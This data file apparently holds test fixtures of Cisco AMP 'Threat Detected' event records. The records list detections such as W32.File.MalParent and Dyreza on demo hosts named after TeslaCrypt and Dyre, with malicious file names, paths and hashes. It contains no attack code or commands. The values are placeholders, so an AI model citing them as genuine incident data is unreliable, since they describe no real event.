Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228942","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228941","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":897000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228940","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":211000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228939","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228938","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
